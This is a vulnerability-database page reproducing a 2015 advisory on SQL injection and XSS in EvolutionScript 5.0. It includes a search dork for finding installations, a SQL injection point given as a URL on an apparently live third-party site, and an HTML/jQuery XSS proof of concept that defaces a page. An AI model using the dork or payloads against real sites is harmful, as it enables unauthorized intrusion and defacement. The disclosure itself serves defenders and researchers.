Lucene search
K

EvolutionScript 5.0 SQL Injection / Cross Site Scripting

🗓️ 07 Dec 2015 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 67 Views

EvolutionScript 5.0 SQL Injection and Cross Site Scripting vulnerabilitie

Code
`evolutionscript v5.0 Mullti Vulnerability  
=========================================  
Author : indoushka  
Vondor : http://EvolutionScript.com  
Dork : Powered by EvolutionScript Version 5.0 Copyright © 2010 - 2015 EvolutionScript.com  
=========================  
Sql injection :  
  
C:\AppServ\www\EvolutionScript\includes\init.php  
Line 145  
mysqli::query  
$todayis,$user_info['id']  
  
poc: http://www.twickerz.com/bannerclick.php?id=15806 (inject her)  
  
Xss :  
  
C:\AppServ\www\EvolutionScript\includes\functions.php  
Line 154  
echo  
$stored  
  
XSS ( HTML Inject ) - jQuery v1.8.2 :  
  
save the code in name.html and open it  
  
<html>  
<head>  
<meta charset="utf-8">  
<title>XSS ( HTML Inject ) - jQuery v1.8.2 </title>  
<script src="http://127.0.0.1/EvolutionScript/js/jquery.min.js"></script>  
  
<script>  
$(function() {  
$('#users').each(function() {  
var select = $(this);  
var option = select.children('option').first();  
select.after(option.text());  
select.hide();  
});  
});  
</script>  
</head>  
  
  
<body>  
<form method="post">  
<p>  
<select id="users" name="users">  
<option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee></script></option>  
</select>  
</p>  
</form>  
</body>  
</html>  
  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/  
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be   
---------------------------------------------------------------------------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation